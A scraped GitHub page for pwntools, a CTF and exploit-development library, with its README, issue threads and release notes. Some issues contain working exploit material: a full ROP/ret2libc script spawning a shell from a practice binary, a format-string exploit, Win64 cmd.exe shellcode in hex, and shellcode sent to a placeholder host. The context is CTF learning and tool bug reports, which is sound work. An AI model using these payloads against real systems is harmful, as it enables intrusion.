CTF framework and exploit development library

Overview

pwntools - CTF toolkit

pwntools logo

PyPI Docs Travis GitHub Workflow Status (branch) Coveralls MIT License Discord Twitter

Pwntools is a CTF framework and exploit development library. Written in Python, it is designed for rapid prototyping and development, and intended to make exploit writing as simple as possible.

from pwn import *
context(arch = 'i386', os = 'linux')

r = remote('exploitme.example.com', 31337)
# EXPLOIT CODE GOES HERE
r.send(asm(shellcraft.sh()))
r.interactive()

Documentation

Our documentation is available at docs.pwntools.com

A series of tutorials is also available online

To get you started, we've provided some example solutions for past CTF challenges in our write-ups repository.

Installation

Pwntools is best supported on 64-bit Ubuntu LTS releases (14.04, 16.04, 18.04, and 20.04). Most functionality should work on any Posix-like distribution (Debian, Arch, FreeBSD, OSX, etc.).

Python3 is suggested, but Pwntools still works with Python 2.7. Most of the functionality of pwntools is self-contained and Python-only. You should be able to get running quickly with

apt-get update
apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade pwntools

However, some of the features (assembling/disassembling foreign architectures) require non-Python dependencies. For more information, see the complete installation instructions here.

Contribution

See CONTRIBUTING.md

Contact and Community

If you have any questions not worthy of a bug report, join the Discord server at https://discord.gg/96VA2zvjCB

Comments
  • Python3 Support

    Python3 Support

    Is this something that we have any interest in implementing? There are a lot of things that I want to use pwntools for, which have Python3 embedded in them (e.g. default GDB on Ubuntu).

    feature 
    opened by zachriggle 41
  • Segmentation fault loading arm binary files on termux

    Segmentation fault loading arm binary files on termux

    Whenever i tried to load the binary on my environment using ELF it crashes and i got segmentation fault. What's the reason behind this? Is there any way to get this work on my device?

    mystery 
    opened by delmarocks 39
  • Automatic building of the binaries in pwnlib/data/binutils

    Automatic building of the binaries in pwnlib/data/binutils

    It would be awesome if we did not depend on the pre-built binaries in pwnlib/data/binutils.

    I built them originally a long time ago and I have a hard time remembering how. I am pretty sure that with the exception of the objcopy/objdump it was a fairly standard thing to do.

    I think that for those two I did some magic to figure out every possible target to compile them in. Or rather: Almost every possible target, as some of them made binutils now build.

    enhancement 
    opened by TethysSvensson 35
  • Parse PLT instructions

    Parse PLT instructions

    Parse the instructions in the PLT section to determine which GOT entry the function stubs are loading.

    This properly handles RELRO and PIE executables across the following configurations:

    x86
    gcc-4.8 (Ubuntu 4.8.5-4ubuntu2) 4.8.5
    Copyright (C) 2015 Free Software Foundation, Inc.
    This is free software; see the source for copying conditions.  There is NO
    warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
    
    x64
    gcc (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609
    Copyright (C) 2015 Free Software Foundation, Inc.
    This is free software; see the source for copying conditions.  There is NO
    warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
    
    arm
    arm-linux-gnueabihf-gcc (Linaro GCC 6.2-2016.11) 6.2.1 20161016
    Copyright (C) 2016 Free Software Foundation, Inc.
    This is free software; see the source for copying conditions.  There is NO
    warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
    
    thumb
    arm-linux-gnueabihf-gcc (Linaro GCC 6.2-2016.11) 6.2.1 20161016
    Copyright (C) 2016 Free Software Foundation, Inc.
    This is free software; see the source for copying conditions.  There is NO
    warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
    
    aarch64
    aarch64-linux-gnu-gcc (Linaro GCC 6.2-2016.11) 6.2.1 20161016
    Copyright (C) 2016 Free Software Foundation, Inc.
    This is free software; see the source for copying conditions.  There is NO
    warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
    
    arm-big
    armeb-linux-gnueabihf-gcc (Linaro GCC 6.2-2016.11) 6.2.1 20161016
    Copyright (C) 2016 Free Software Foundation, Inc.
    This is free software; see the source for copying conditions.  There is NO
    warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
    
    thumb-big
    armeb-linux-gnueabihf-gcc (Linaro GCC 6.2-2016.11) 6.2.1 20161016
    Copyright (C) 2016 Free Software Foundation, Inc.
    This is free software; see the source for copying conditions.  There is NO
    warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
    
    aarch64-big
    aarch64_be-linux-gnu-gcc (Linaro GCC 6.2-2016.11) 6.2.1 20161016
    Copyright (C) 2016 Free Software Foundation, Inc.
    This is free software; see the source for copying conditions.  There is NO
    warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
    

    testcases.zip contains sample binaries - these might be nice to add to the repo as actual test cases if possible (for regression testing, etc.).

    Note that I haven't tested these changes with non-GCC compilers yet, so further testing is strongly appreciated (in particular, it'd be nice to know what linux-clang does!).

    enhancement 
    opened by nneonneo 24
  • Pwntools runs especially slow on ubuntu compared to other distros

    Pwntools runs especially slow on ubuntu compared to other distros

    Consider the attached zip file; help.zip

    On migrating from Kali to Ubuntu 20.04.2.0 LTS, I have noticed that pwntools runs significant slowly for local scripts on Ubuntu as compared to other linux distros.

    Here is the result of the same script being ran on Ubuntu 20.04.2.0 LTS VMWare versus Kali Linux Virtualbox

    Ubuntu 20.04.2.0 LTS VMware:

    image

    Kali Linux VirtualBox:

    image

    Running more tests, I have also experimented with other flavors as well:

    Ubuntu 18.04 VMware : 2 minutes

    Ubuntu Vagrant (VBOX) : 1 minute (attributed to the tester's faster pc but still significantly slow)

    Debian Buster (Clean Install) : 5 seconds

    Ubuntu WSL1 : 9 seconds

    Furthermore, I have tried it on both v4.7.0 (dev) and v4.5.0 (stable) and the same issue persists.

    Hence the only common cause spotted was the use of Ubuntu Desktop, which runs pwntools rather slowly.

    Unable to get to the bottom of the issue so far, please do look into this and let me know if theres anything I can do to get to the bottom of this issue.

    bug backport-required 
    opened by caprinux 21
  • Python 3 compatibility [ready]

    Python 3 compatibility [ready]

    This branch is highly experimental, I don't even expect to get it merged any time soon (I should probably split it into several PRs), but I guess it is quite ready for automatic testing and reviews.

    opened by Arusekk 21
  • NameError: global name 'numb' is not defined

    NameError: global name 'numb' is not defined

    Traceback (most recent call last):
      File "foo.py", line 907, in <module>
        inp = sys.stdin.readline().strip().decode('utf-8')
      File "/lib/python2.7/site-packages/pwnlib/term/readline.py", line 412, in readline
        return readline(size)
      File "/lib/python2.7/site-packages/pwnlib/term/readline.py", line 376, in readline
        keymap.handle_input()
      File "/lib/python2.7/site-packages/pwnlib/term/keymap.py", line 20, in handle_input
        self.send(key.get())
      File "/lib/python2.7/site-packages/pwnlib/term/key.py", line 164, in get
        k = _peek()
      File "/lib/python2.7/site-packages/pwnlib/term/key.py", line 159, in _peek
        return _peek_ti() or _peek_csi() or _peek_simple()
      File "/lib/python2.7/site-packages/pwnlib/term/key.py", line 393, in _peek_csi
        return _peekkey_ss3(2)
      File "/lib/python2.7/site-packages/pwnlib/term/key.py", line 372, in _peekkey_ss3
        _cbuf = _cbuf[numb:] # XXX: numb is not defined
    NameError: global name 'numb' is not defined
    
    

    this happens when i press + and enter on the numeric block without having numlock on. also kinda weird even that this is handled by pwnlib, since i call a function from sys.

    bug 
    opened by rofl0r 21
  • Attempt at improving logging

    Attempt at improving logging

    The logging subsystem was rewritten to use the logging module. I think this is a good idea and I think we can do it better. This PR is an attempt at that.

    The current logging subsystem has some issues:

    • It installs a new default Logger class. This means that if someone imports pwnlib and then uses the logging module they will get our overloaded Logger's. While this may not cause any problems (our Logger works just like logging.Logger in most regards) it is still bad; import pwnlib should have no side-effects.
    • We generate different log records for the same program depending on the value of term.term_mode. If I install a file logger, I shouldn't see any difference.
    • Spinners generate log levels originating from loggers names 'pwnlib.spinner.x'. This makes it hard to filter messages from a single submodule.

    Lets begin with the latter issue. If I run this:

    from pwn import *
    import logging
    logger = logging.getLogger('pwnlib.tubes.listen')
    logger.setLevel(logging.WARNING)
    sock = listen(1337).wait_for_connection()
    

    I expect the spinners to not show. But they do. Instead I have to write:

    from pwn import *
    import logging
    logger = logging.getLogger('pwnlib.spinner')
    logger.setLevel(logging.WARNING)
    sock = listen(1337).wait_for_connection()
    

    But then I can't have any spinners at all :(.

    Next issue; If I run this:

    from pwn import *
    sock = listen(1337)
    sock.recvall()
    

    And the send 10MB, I see this in my terminal:

    [+] Trying to bind to 0.0.0.0 on port 1337: Done
    [+] Waiting for connections on 0.0.0.0:1337: Got connection from 127.0.0.1 on port 35277
    [+] Recieving all data: Done (10.00MB)
    [*] Closed connection to 127.0.0.1 port 35277
    

    Which is fine. But if I then also log to a file:

    from pwn import *
    import logging
    logging.basicConfig(filename = 'test.log')
    sock = listen(1337)
    sock.recvall()
    

    Then the file contains:

    INFO:pwnlib.tubes.sock:Closed connection to 127.0.0.1 port 35279
    

    But if I instead pipe the output from python into cat (thus setting term.term_mode to false) I see this in my terminal:

    [*] Trying to bind to 0.0.0.0 on port 1337: 
    [*] Trying to bind to 0.0.0.0 on port 1337: Trying 0.0.0.0
    [+] Trying to bind to 0.0.0.0 on port 1337: Done
    [*] Waiting for connections on 0.0.0.0:1337: 
    [*] Recieving all data: 
    [+] Waiting for connections on 0.0.0.0:1337: Got connection from 127.0.0.1 on port 35282
    [*] Recieving all data: 0B
    [*] Recieving all data: 1.69MB
    [*] Recieving all data: 3.47MB
    [*] Recieving all data: 5.24MB
    [*] Recieving all data: 7.08MB
    [*] Recieving all data: 8.92MB
    [+] Recieving all data: Done (10.00MB)
    [*] Closed connection to 127.0.0.1 port 35282
    

    And this in test.log:

    INFO:pwnlib.spinner.0:Trying to bind to 0.0.0.0 on port 1337: 
    INFO:pwnlib.spinner.0:Trying to bind to 0.0.0.0 on port 1337: Trying 0.0.0.0
    INFO:pwnlib.spinner.0:Trying to bind to 0.0.0.0 on port 1337: Done
    INFO:pwnlib.spinner.1:Waiting for connections on 0.0.0.0:1337: 
    INFO:pwnlib.spinner.2:Recieving all data: 
    INFO:pwnlib.spinner.1:Waiting for connections on 0.0.0.0:1337: Got connection from 127.0.0.1 on port 35282
    INFO:pwnlib.spinner.2:Recieving all data: 0B
    INFO:pwnlib.spinner.2:Recieving all data: 1.69MB
    INFO:pwnlib.spinner.2:Recieving all data: 3.47MB
    INFO:pwnlib.spinner.2:Recieving all data: 5.24MB
    INFO:pwnlib.spinner.2:Recieving all data: 7.08MB
    INFO:pwnlib.spinner.2:Recieving all data: 8.92MB
    INFO:pwnlib.spinner.2:Recieving all data: Done (10.00MB)
    INFO:pwnlib.tubes.sock:Closed connection to 127.0.0.1 port 35282
    

    All three issues are resolved in this PR.

    enhancement 
    opened by br0ns 19
  • What are the semantics of the return value and the `timeout` argument of the `pwnlib.tubes.tubes.recv*`-functions?

    What are the semantics of the return value and the `timeout` argument of the `pwnlib.tubes.tubes.recv*`-functions?

    The semantics have already changes several times, and I think that is mostly due to them never been explicitly written down. So let's fix that.

    Currently the semantics are as follows to the best of my knowledge.

    Return value:

    • If the call was successful the received data is returned.
    • If there was a timeout ("timeout" should be clarified -- @zachriggle?) the empty string is returned.
    • If the tube is closed EOFError is raised.

    The timeout-argument:

    • If None, the "default" value is used. The default value can refer to a value given when creating a socket or context.timeout if None was also given here.
    • If a non-negative number is given this is used as the timeout during the function call (or the tubes lifetime if in a constructor).
    • Everything else raises an error.

    I can recall at least three other semantics being applied in pwnlib.

    I suggest we adapt these new semantics:

    Return value:

    • If the call was successful the received data is returned.
    • If there was a timeout (again, needs clarification) socket.timeout is raised.
    • If the tube is closed EOFError is raised.

    The timeout-argument:

    • If the string 'default' is given, the "default" value is used, as described above.
    • If None is given there is no timeout, i.e. blocking forever is possible. This is also the semantics of socket module in the standard library.
    • If a non-negative number is given the semantics are as described above.
    • Everything else raises an error.

    The biggest issue I have with the current semantics is returning the empty string when a timeout occurs. On several occasions I've made a typo in e.g. a recvuntil-call and thus always got the empty string as a result; if this result is never used it can be hard to find the bug.

    I also really think we should adopt the None means no timeout -semantics, as 1) they are used by the standard library and 2) timeout = None reads better. Also note that the user will never have to actually write 'default' so it can be anything other than None and numbers.

    question 
    opened by br0ns 18
  • [WIP] Selectively skip doctest

    [WIP] Selectively skip doctest

    The intention of this is to make it possible to test pwntools on systems where some functionality is known not to work. This makes use of a new sphinx feature to selectively disable doctests. In particular, doctests that require binutils/qemu for a specific architecture, doctests that require internet access and doctests that depend on specific machine setup (marked travis) can be skipped.

    This is a work in progress. Currently all flags are hardcoded as False, instead they should default to True and be changeable through flags or environment variables. But it should be ready for general feedback on the main idea. Is this something you'd in principle be willing to consider @zachriggle?

    My use-case for this is automated testing for distribution packaging. Another usecase would be a possibility for contributers to run at least some of the testsuite locally without having the full setup that is available on travis.

    opened by timokau 17
  • pwnlib.dynelf.DynELF breaks something to make exploit broken

    pwnlib.dynelf.DynELF breaks something to make exploit broken

    It looks like a bug.

    I am following an article(chinese language) to learn ROP.

    Assumption: YOU DONT HAVE libc.so.

    The system is i686 Ubuntu 15.04:

    Linux vagrant 3.19.0-56-generic #62-Ubuntu SMP Thu Mar 10 22:39:28 UTC 2016 i686 i686 i686 GNU/Linux
    

    The vulnerable program:

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    
    void vulnerable_function() {
        char buf[128];
        read(STDIN_FILENO, buf, 256);
    }
    
    int main(int argc, char** argv) {
        vulnerable_function();
        write(STDOUT_FILENO, "Hello, World\n", 13);
    }
    

    DISAS:

    (gdb) disas main
    Dump of assembler code for function main:
       0x0804840d <+0>: push   %ebp
       0x0804840e <+1>: mov    %esp,%ebp
       0x08048410 <+3>: and    $0xfffffff0,%esp
       0x08048413 <+6>: sub    $0x10,%esp
       0x08048416 <+9>: call   0x80483e4 <vulnerable_function>
       0x0804841b <+14>:    movl   $0xd,0x8(%esp)
       0x08048423 <+22>:    movl   $0x8048504,0x4(%esp)
       0x0804842b <+30>:    movl   $0x1,(%esp)
       0x08048432 <+37>:    call   0x8048300 <[email protected]>
       0x08048437 <+42>:    leave
       0x08048438 <+43>:    ret
    End of assembler dump.
    (gdb) disas vulnerable_function
    Dump of assembler code for function vulnerable_function:
       0x080483e4 <+0>: push   %ebp
       0x080483e5 <+1>: mov    %esp,%ebp
       0x080483e7 <+3>: sub    $0x98,%esp
       0x080483ed <+9>: movl   $0x100,0x8(%esp)
       0x080483f5 <+17>:    lea    -0x88(%ebp),%eax
       0x080483fb <+23>:    mov    %eax,0x4(%esp)
       0x080483ff <+27>:    movl   $0x0,(%esp)
       0x08048406 <+34>:    call   0x8048320 <[email protected]>
       0x0804840b <+39>:    leave
       0x0804840c <+40>:    ret
    End of assembler dump.
    

    ASLR:

    $ cat /proc/sys/kernel/randomize_va_space
    2
    

    compile:

    $ gcc -fno-stack-protector -o level2 level2.c
    

    Addr of .bss:

    [25] .bss              NOBITS          0804a024 001024 000004 00  WA  0   0  1
    

    gadgets:

    $ ROPgadget --binary ./level2 --only "pop|pop|pop|ret"
    Gadgets information
    ============================================================
    0x0804850b : pop ebp ; ret
    0x08048508 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
    0x080482f1 : pop ebx ; ret
    0x0804850a : pop edi ; pop ebp ; ret
    0x08048509 : pop esi ; pop edi ; pop ebp ; ret
    0x080482da : ret
    0x080483ce : ret 0xeac1
    
    Unique gadgets found: 7
    

    Addr of vulnerable_function:

    (gdb) print vulnerable_function
    $1 = {<text variable, no debug info>} 0x804844b <vulnerable_function>
    

    the exploit: you see a leak there using [email protected] to get the actual addr of write

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    from pwn import *
    
    elf = ELF('./level2')
    plt_write = elf.symbols['write']
    plt_read = elf.symbols['read']
    vulfun_addr = 0x804844b
    
    def leak(address):
        payload1 = 'a'*140 + p32(plt_write) + p32(vulfun_addr) + p32(1) +p32(address) + p32(4)
        p.send(payload1)
        data = p.recv(4)
        print "%#x => %s" % (address, (data or '').encode('hex'))
        return data
    
    
    p = process('./level2')
    #p = remote('127.0.0.1', 10002)
    
    d = DynELF(leak, elf=ELF('./level2'))
    
    system_addr = d.lookup('system', 'libc')
    print "system_addr=" + hex(system_addr)
    
    bss_addr = 0x0804a024
    pppr = 0x08048509 # addr of pop pop pop ret
    
    payload2 = 'a'*140  + p32(plt_read) + p32(pppr) + p32(0) + p32(bss_addr) + p32(10)
    payload2 += p32(system_addr) + p32(vulfun_addr) + p32(bss_addr)
    #ss = raw_input()
    
    print "\n###sending payload2 ...###"
    p.send(payload2)
    p.send("/bin/dash\0")
    
    p.interactive()
    

    And I got this:

    [+] Started program './level2'
    0x8048000 => 7f454c46
    [+] Loading from '/home/vagrant/workspace/rop/level2': Done
    0x804a004 => 383977b7
    [+] Resolving 'system' in 'libc.so': 0xb7773938
    0x8049f14 => 01000000
    0x8049f1c => 0c000000
    0x8049f24 => 0d000000
    0x8049f2c => 19000000
    0x8049f34 => 1b000000
    0x8049f3c => 1a000000
    0x8049f44 => 1c000000
    0x8049f4c => f5feff6f
    0x8049f54 => 05000000
    0x8049f5c => 06000000
    0x8049f64 => 0a000000
    0x8049f6c => 0b000000
    0x8049f74 => 15000000
    0x8049f7c => 03000000
    0x8049f80 => 00a00408
    0xb777393c => 243c77b7
    0xb7773c24 => 00000000
    0xb7773944 => 283c77b7
    0xb7773c2c => 943e77b7
    0xb7773e94 => 00000000
    0xb7773c34 => 58c874b7
    0xb774c85c => 38c874b7
    0xb774c838 => 2f6c6962
    0xb774c83c => 2f693338
    0xb774c840 => 362d6c69
    0xb774c844 => 6e75782d
    0xb774c848 => 676e752f
    0xb774c84c => 6c696263
    0xb774c850 => 2e736f2e
    0xb774c854 => 36000000
    0xb774c858 => 00a058b7
    0xb758a000 => 7f454c46
    0xb774c860 => a40d74b7
    0xb758a004 => 01010103
    0xb7740da4 => 01000000
    0xb7740dac => 0e000000
    0xb7740db4 => 0c000000
    0xb7740dbc => 19000000
    0xb7740dc4 => 1b000000
    0xb7740dcc => 04000000
    0xb7740dd4 => f5feff6f
    0xb7740dd8 => b8a158b7
    0xb7740ddc => 05000000
    0xb7740de0 => 747459b7
    0xb7740de4 => 06000000
    0xb7740de8 => d4de58b7
    0xb758a1b8 => f3030000
    0xb758a1bc => 0a000000
    0xb758a1c0 => 00020000
    0xb758b390 => a5050000
    0xb758d000 => 8ae4ee1c
    0xb7593924 => a1300000
    0xb759a515 => 73797374
    0xb759a519 => 656d0074
    0xb7593928 => 60b10300
    system_addr=0xb75c5160
    
    ###sending payload2 ...###
    [*] Switching to interactive mode
    $ ls
    [*] Got EOF while reading in interactive
    $ ls
    [*] Program './level2' stopped with exit code -11
    [*] Got EOF while sending in interactive
    

    It looks like something breaks the interactive mode. I typed two times ls, then ENTER. When did I send EOF? And I could not find info about exit code -11.

    UPDATED: The 140 is confirmed in a core dump using exploit-pattern

    opened by naijim 17
  • Add basic shellcode for Win64 to shellcraft

    Add basic shellcode for Win64 to shellcraft

    This adds basic WinExec("cmd.exe") Win64 shellcode generation to shellcraft. The generated shellcode does not contain null-bytes.

    I've tried to split it up into smaller reusable chunks. Used it with some windows pwn and it worked for me.

    We could try to add tests using wine, but since windows support is more of an addon in pwntools I didn't go for it yet.

    $ shellcraft amd64.windows.cmd
    [!] Could not find system include headers for amd64-windows
    31f665488b5e60488b5b18488b732048ad489648ad488b5820448b433c4c89c24801da4531c941b1884c01ca448b024901d8418b70204801de4831c949b947657450726f634148ffc18b048e4801d84c390875f2418b70244801de668b0c4e418b701c4801de8b048e4801d84889c748b801010101010101015048b856686f4479646201483104244889e231f665488b4e60488b4918488b712048ad489648ad488b48204883ec30ffd74883c4384889c648b801010101010101015048b8626c652f64796401483104244889e14883ec30ffd64883c438ebfe
    
    opened by peace-maker 0
  • shellcraft: mips syscall with 6 arguments ignores arg4 and arg5

    shellcraft: mips syscall with 6 arguments ignores arg4 and arg5

    When trying to call a syscall with more than 4 arguments, the excess arguments are silently ignored instead of pushing them to the stack.

    $ shellcraft -f asm mips.linux.syscall SYS_sendto 3 0x123456 0x100 0 0xabcdefff 0x10
        /* call sendto(3, 0x123456, 0x100, 0, 0xabcdefff, 0x10) */
        li $t9, ~3
        not $a0, $t9
        li $t9, ~0x123456
        not $a1, $t9
        li $t9, ~0x100
        not $a2, $t9
        slti $a3, $zero, 0xFFFF /* $a3 = 0 */
        ori $v0, $zero, SYS_sendto
        syscall 0x40404
    

    The expected output would include the last two arguments on the stack:

    /* call sendto(3, 0x123456, 0x100, 0, 0xabcdefff, 0x10) */
    addiu $sp, $sp, -0x18
    li $v0, 0xabcdefff
    sw $v0, 0x10($sp)
    li $t9, ~0x10
    not $v0, $t9
    sw $v0, 0x14($sp)
    
    li $t9, ~3
    not $a0, $t9
    li $t9, ~0x123456
    not $a1, $t9
    li $t9, ~0x100
    not $a2, $t9
    slti $a3, $zero, 0xFFFF /* $a3 = 0 */
    /* call sendto() */
    ori $v0, $zero, SYS_sendto
    syscall 0x40404
    
    bug backport-required 
    opened by peace-maker 0
  • Fixes for download_dir

    Fixes for download_dir

    • Fixes a bug of missing .recvall().strip() when self.sftp == False
    • Adds option ignore_failed_read to ignore files in the folder that current user has no read access
    • Deletes created temporary file after download
    opened by Jusb3 0
  • Configure /usr/pwntools-doc

    Configure /usr/pwntools-doc

    hi!

    I'm trying to package the new 4.9.0 version and noticed this diff by our packaging tools:

    usr/lib/python3.10/site-packages/pwntools-doc/		      |	usr/pwntools-doc/
    usr/lib/python3.10/site-packages/pwntools-doc/CHANGELOG.md    |	usr/pwntools-doc/CHANGELOG.md
    usr/lib/python3.10/site-packages/pwntools-doc/CONTRIBUTING.md |	usr/pwntools-doc/CONTRIBUTING.md
    usr/lib/python3.10/site-packages/pwntools-doc/DOCKER.md	      |	usr/pwntools-doc/DOCKER.md
    usr/lib/python3.10/site-packages/pwntools-doc/LICENSE-pwntool |	usr/pwntools-doc/LICENSE-pwntools.txt
    usr/lib/python3.10/site-packages/pwntools-doc/README.md	      |	usr/pwntools-doc/README.md
    usr/lib/python3.10/site-packages/pwntools-doc/TESTING.md      |	usr/pwntools-doc/TESTING.md
    usr/lib/python3.10/site-packages/pwntools-doc/requirements.tx |	usr/pwntools-doc/requirements.txt
    

    I ultimately don't care that much about the documentation location, but /usr/pwntools-doc is not a standard location according to the Filesystem Hierarchy Standard. Is there a way I can change this to /usr/share/doc/pwntools when building the package?

    I'm using this command to prepare the package contents (${pkgdir} is the directory that gets put into the package):

    python setup.py install -O1 --root="${pkgdir}" --skip-build --only-use-pwn-command
    

    Thanks!

    feature 
    opened by kpcyrd 1
  • FmtStr IndexError: list index out of range

    FmtStr IndexError: list index out of range

    image Newest Version. image The process is random, sometimes more and sometimes less, but there is bound to be an error.

    Traceback (most recent call last): File "/ root/Desktop/PwnExploits/test.py", line 11, in < module >. Autofmt = FmtStr (exec_fmt). File "/ usr/local/lib/python3.10/dist-packages/pwnlib/fmtstr.py", line 844, in _ _ init__. Self.offset, self.padlen = self.find_offset (). File "/ usr/local/lib/python3.10/dist-packages/pwnlib/fmtstr.py", line 863, in find_offset. Leak = self.leak_stack (off, marker). File "/ usr/local/lib/python3.10/dist-packages/pwnlib/fmtstr.py", line 854, in leak_stack. Leak = re.findall (br "START (. *?) END", leak, re.MULTILINE | re.DOTALL) [0]. IndexError: list index out of range

    #2077 tried but not work , still have this error.and dont know why. I have tried a lot of ppls code , including pwntools's wiki

    from pwn import *

    def exec_fmt(pad): p = process("/root/Desktop/PwnSubjects/pwn5") p.send(pad) info = p.recv() return info

    autofmt = FmtStr(exec_fmt) offset = autofmt.offset print("offset ===> ", offset)

    p = process("/root/Desktop/PwnSubjects/pwn5") bss_ad = 0x0804C044 pad = fmtstr_payload(offset, {bss_ad:1}) p.send(pad) p.recvuntil("your passwd:") p.send("1")

    p.interactive()

    elf: pwn5.zip

    bug backport-required 
    opened by XKaguya 2
  • Handle `context.newline` correctly in `tube.interactive()`

    Handle `context.newline` correctly in `tube.interactive()`

    The context.newline or self.newline variable isn't obeyed when typing in interactive mode. It is used when sending and receiving lines through tube.sendline though, causing a mismatch.

    The receiving end of the tube.interactive() already has handling of newlines, but the sending side does not.

    Example:

    from pwn import *
    io = process('cat')
    io.newline = b'\r\n'
    io.sendline(b'auto')
    io.interactive()
    
    $ python testinteractive.py DEBUG
    [x] Starting local process '/usr/bin/cat' argv=[b'cat']
    [+] Starting local process '/usr/bin/cat' argv=[b'cat'] : pid 19060
    [DEBUG] Sent 0x6 bytes:
        b'auto\r\n'
    [*] Switching to interactive mode
    [DEBUG] Received 0x6 bytes:
        b'auto\r\n'
    auto
    $ test
    [DEBUG] Sent 0x5 bytes:
        b'test\n'
    [DEBUG] Received 0x5 bytes:
        b'test\n'
    test
    

    The expected outcome would be to send b'test\r\n'.

    The same problem arises in non-term mode (PWNLIB_NOTERM=1), where stdin is read in binary mode causing the OS line seperators to come through. Correctly replacing them with the context.newline setting allows to use the interactive input on windows hosts as well, without constantly sending \r\n.

    opened by peace-maker 7
Releases(4.10.0beta0)
  • 4.10.0beta0(Dec 29, 2022)

    • #2062 make pwn cyclic -l work with entry larger than 4 bytes
    • #2092 shellcraft: dup() is now called dupio() consistently across all supported arches
    • #2093 setresuid() in shellcraft uses current euid by default
    • #2125 Allow tube.recvregex to return capture groups
    • #2144 Removes p2align 2 asm() headers from x86-32, x86-64 and mips architectures to avoid inconsistent instruction length when patching binaries
    Source code(tar.gz)
    Source code(zip)
  • 4.9.0(Dec 29, 2022)

    • #1975 Add libcdb commandline tool
    • #1979 Add js_escape() and js_unescape() to util.fiddling
    • #2011 Fix tube's debug output of same byte compression
    • #2023 Support KDE Konsole in run_in_new_terminal function
    • #2027 Fix ELF.libc_start_main_return with glibc 2.34
    • #2033 Quote file and core path in generated GDB script
    • #2035 Change Buffer's parent class to object
    • #2037 Allow SSH tunnel to be treated like a TCP socket (with 'raw=True')
    • #2123 Fix ROP without a writeable cache directory
    • #2124 Fix tube.recvpred() timeout argument
    Source code(tar.gz)
    Source code(zip)
  • 4.9.0beta0(Apr 20, 2022)

    • #1975 Add libcdb commandline tool
    • #1979 Add js_escape() and js_unescape() to util.fiddling
    • #2011 Fix tube's debug output of same byte compression
    • #2023 Support KDE Konsole in run_in_new_terminal function
    • #2027 Fix ELF.libc_start_main_return with glibc 2.34
    • #2033 Quote file and core path in generated GDB script
    • #2035 Change Buffer's parent class to object
    • #2037 Allow SSH tunnel to be treated like a TCP socket (with 'raw=True')
    Source code(tar.gz)
    Source code(zip)
  • 4.8.0(Apr 20, 2022)

    • #1922 Fix logic in wait_for_debugger
    • #1828 libcdb: Load debug info and unstrip libc binary
    • #1939 Fix error in validating log levels
    • #1981 Fix cyclic_find() to make it work with large int values
    Source code(tar.gz)
    Source code(zip)
  • 4.7.1(Apr 20, 2022)

    • #1784 Use temporary cache directory when persistent cache cannot be used
    • #1973 ELF symbols can be looked up by bytes values
    • several bugfixes (#2012, #2031, #1912, #1961, #2007, #2040, #2051)
    Source code(tar.gz)
    Source code(zip)
  • 4.8.0beta0(Nov 15, 2021)

  • 4.7.0(Nov 15, 2021)

    • #1733 Update libc headers -> more syscalls available!
    • #1876 add self.message and change sys.exc_type to sys.exec_info() in PwnlibException
    • #1877 encoders error message handles when avoid is bytes in python3
    • #1891 Keep ROP gadgets when setting registers via setattr/call
    • #1892 Silence SIGPIPE error for "pwn phd"
    • #1893 Fix bytes warning in "pwn cyclic"
    • #1897 Add basic support for RISC-V
    • #1903 Add zsh completion script
    • #1904 Add bash completion script
    • #1906 Defer import of several modules to save on startup time
    • #1921 Add basic support for the bare-metal ARM specific toolchain
    • #1995 Add shellcraft.*.linux.cat2, which uses alloc+read+write instead of sendfile
    Source code(tar.gz)
    Source code(zip)
  • 4.7.0beta0(Jul 12, 2021)

    • #1733 Update libc headers -> more syscalls available!
    • #1876 add self.message and change sys.exc_type to sys.exec_info() in PwnlibException
    • #1877 encoders error message handles when avoid is bytes in python3
    • #1891 Keep ROP gadgets when setting registers via setattr/call
    • #1892 Silence SIGPIPE error for "pwn phd"
    • #1893 Fix bytes warning in "pwn cyclic"
    • #1897 Add basic support for RISC-V
    • #1903 Add zsh completion script
    • #1904 Add bash completion script
    • #1906 Defer import of several modules to save on startup time
    • #1921 Add basic support for the bare-metal ARM specific toolchain
    Source code(tar.gz)
    Source code(zip)
  • 4.6.0(Jul 12, 2021)

    • #1429 Add a mechanism for ret2csu (originally #1138)
    • #1566 Add ignore_config argument to pwnlib.tubes.ssh and improve allow_agent implementation
    • #1652 Add process.readmem and process.writemem
    • #1739 Add/fix shellcraft.linux.kill() / shellcraft.linux.killparent()
    • #1746 Prefer Python3 over Python2 for spawning remote processes over SSH
    • #1751 Fix process() with executable relative to cwd
    • #1753 major change: less unconditional imports in pwnlib
    • #1776 mips: do not use $t0 temporary variable in dupio
    • #1846 support launching GDB in more different terminals
    Source code(tar.gz)
    Source code(zip)
  • 4.6.0beta1(May 31, 2021)

  • 4.5.1(May 31, 2021)

  • 4.6.0beta0(Apr 30, 2021)

    • #1429 Add a mechanism for ret2csu (originally #1138)
    • #1566 Add ignore_config argument to pwnlib.tubes.ssh and improve allow_agent implementation
    • #1652 Add process.readmem and process.writemem
    • #1739 Add/fix shellcraft.linux.kill() / shellcraft.linux.killparent()
    • #1746 Prefer Python3 over Python2 for spawning remote processes over SSH
    • #1751 Fix process() with executable relative to cwd
    • #1753 major change: less unconditional imports in pwnlib
    • #1776 mips: do not use $t0 temporary variable in dupio
    • #1846 support launching GDB in more different terminals
    Source code(tar.gz)
    Source code(zip)
  • 4.5.0(Apr 30, 2021)

    • #1261 Misc run_in_new_terminal improvements (notably gdb terminated by default)
    • #1695 Allow using GDB Python API
    • #1735 Python 3.9 support in safeeval
    • #1738 Which function support custom search path
      • process also looks now at env['PATH'] to find the path for the executable
    • #1742 New baremetal os to debug binaries executed with qemu-system-$(arch)
